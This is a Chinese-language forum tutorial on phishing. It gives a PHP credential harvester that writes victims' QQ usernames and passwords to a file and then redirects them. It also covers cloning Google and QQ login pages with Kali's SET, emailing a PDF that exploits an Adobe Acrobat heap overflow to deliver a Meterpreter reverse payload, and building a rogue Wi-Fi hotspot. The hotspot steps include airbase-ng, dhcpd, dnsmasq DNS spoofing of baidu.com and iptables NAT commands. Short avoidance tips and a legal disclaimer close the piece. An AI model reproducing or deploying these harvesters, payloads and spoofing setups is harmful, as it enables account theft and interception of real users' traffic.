注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。0x00 伺服器端搭建的釣魚頁面
這種釣魚頁面,較為常見,攻擊者註冊與相關網站類似的域名,然後利用該網站的主頁或登入頁面進行誘騙,引誘被攻擊者輸入賬號密碼等個人資訊。
這裡利用手裡閒置的阿里的一臺伺服器給大家做一下演示,構造一個簡單的手機端釣魚頁面。
先來看一下後端的主要程式碼:
[PHP] 純文字檢視 複製程式碼
<?php
if (isset($_POST["user"])) {
if (isset($_POST["pass"])) {
$myfile = fopen("fish.txt", "a") or die("Unable to open file!");
$txt = "賬號".$_POST["user"]." 密碼".$_POST["pass"];
fwrite($myfile, $txt);
fclose($myfile);
//在這裡他完成輸入之後進行跳轉
</script>';//echo是輸出函式,可以輸出文字或者變數
}
}
?>
可以看到在被攻擊者輸入賬號密碼以後,資訊被提交到同目錄下的 fish.txt 中,然後進行網站的跳轉,跳轉到真實的 qq 空間頁面。
在手機端是看不出什麼異常的,但是我們用電腦開啟看看。
在電腦端開啟的網站,url 地址顯示的是該釣魚頁面搭建的伺服器域名和地址。
如果在這裡我們輸入了賬號和密碼,資訊就會到 fist.txt 中。
而且如果你的手機有qq空間app的客戶端,不管你輸入什麼,都是會直接跳轉到你的空間的,在你沒覺得有什麼事情發生時,你的資訊就已經洩露了。
x01 用 kali set 生成的釣魚網站
這裡我們先來利用 社會工程學工具包 SET 中自帶的模組來生成 goole 的釣魚頁面。
生成以後我們訪問該 ip 地址,可以看到是 goole 的登入頁面,而且這個時候 kali 接受到一條訪問 ip 的資訊,我們嘗試輸入資訊,點選登入,kail中就可以直接得到資訊。
在倒數第二步我們選擇2.site clone ,還可以克隆其它頁面。這裡我又嘗試了去克隆 qq 空間的登入頁面。
不過這裡我發現在你 qq 登入的情況下,釣魚頁面會直接進入真正的 qq 空間的登入頁面,而且如果你使用快捷登入的方式或者掃碼登入的方式,資訊是不會被監聽到的。
0x02 用 kali set 傳送釣魚郵件
這裡我們嘗試構造一個利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢位攻擊) 漏洞,然後預設將 Metasploit 中的 Meterpreter 反向攻擊荷載記載到 PDF 檔案中,假如目標機中安裝有 Adobe Acrobat ,且存在該漏洞,我們就可以在對方開啟檔案時,釣魚成功。
下面是具體操作:
163郵箱的 SMTP 服務授權碼設定見下:
郵件傳送成功就像這樣。
但是,這個測試的時候,生成的帶有 Payload 的附件,有時候會被檢測出來。我們來檢視這個報錯返回了什麼,報錯狀態碼為 554,我們檢視後面的連結可以看到是因為附件被163檢測出來了。
0x04 利用釣魚熱點釣魚
這次我們利用 kali 和一個無線網絡卡,來構造一個釣魚熱點,本地搭建 DNS 服務,修改 DNS 服務配置來欺騙受害者。
將 kali 與物理機進行橋接,與物理機在一個網段,然後插入無線網絡卡。
因為要啟動 dhcp 服務,我們先給虛擬網絡卡 eth0 設定一個靜態 ip 地址,
[AppleScript] 純文字檢視 複製程式碼
gedit /etc/network/interfaces
iface eth0 inet static //說明靜態配置
auto eth0 //指定網絡卡
address 192.168.43.76 //配置靜態ip
netmask 255.255.255.0 //子網掩碼
gateway 192.168.43.1 //閘道器
重啟 kali 的網路。之後我們將網絡卡 wlan0 設定為監聽模式
[AppleScript] 純文字檢視 複製程式碼
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
接下來我們使用命令airbase-ng -e CICO -c 11 wlan0mon去建立 WIFI 。
保持該程序,重新開啟一個終端,配置 wifi 閘道器。
ifconfig at0 up //啟動新建的 at0 虛擬網絡卡
gedit /etc/network/interfaces
auto at0
iface at0 inet static
address 192.168.1.1
netmask 255.255.255.0
重啟 kali 的網路,可以看到 at0 已經有 ip 地址了。
接下來我們再來安裝配置 dhcp 服務,沒有該服務,手機無法連線釣魚 wifi。
安裝以後,我們設定一下網段,子網掩碼,閘道器地址,預設 dns 伺服器地址,配置如下:
gedit /etc/dhcp/dhcpd.conf
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.150;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.43.76; }
將 at0 指定為 dhcp 的網絡卡。
gedit /etc/default/isc-dhcp-server
INTERFACESv4='at0'
重新啟動 dhcp 服務。
下面我們來配置最重要的地方,就是 dns 服務,以 dnsmasq 為例,具體配置大家可以參考這篇文章。
https://sp4rkw.blog.csdn.net/article/details/101681716
我們之所以可以用該熱點釣魚成功就在於 dns 服務的配置,安裝以後我們進行如下配置:
gedit /etc/dnsmasq.conf
resolv-file=/etc/resolv.conf
strict-order
listen-address=192.168.43.76
address=/baidu.com/47.**.**.** //將域名解析到如下地址,該例中我嘗試將baidu.com的域名解析到我自己的伺服器下。
server=8.8.8.8
server=114.114.114.114
重啟 dnsmasq 服務。
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76
這裡我們就完成了釣魚熱點的搭建,連上熱點的手機訪問百度的域名都會被解析到我的伺服器地址......
0x05 避免釣魚方法總結
(1.)不要隨意連公共的 WIFI 網路。
(2.)涉及到賬戶,密碼等個人資訊的提交登入時,確保網路環境可信。
(3.)儘量不使用賬號密碼的登入方式登入。
(4.)垃圾或者來歷不明的郵件附件不要檢視。
(5.)別相信絕對安全。
注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。
-
1 #
-
2 #
哈哈 ,這個漏洞好 , ~! 強烈推薦 !!!
以前聽到黑客挺恐懼的,看了你的文章很受用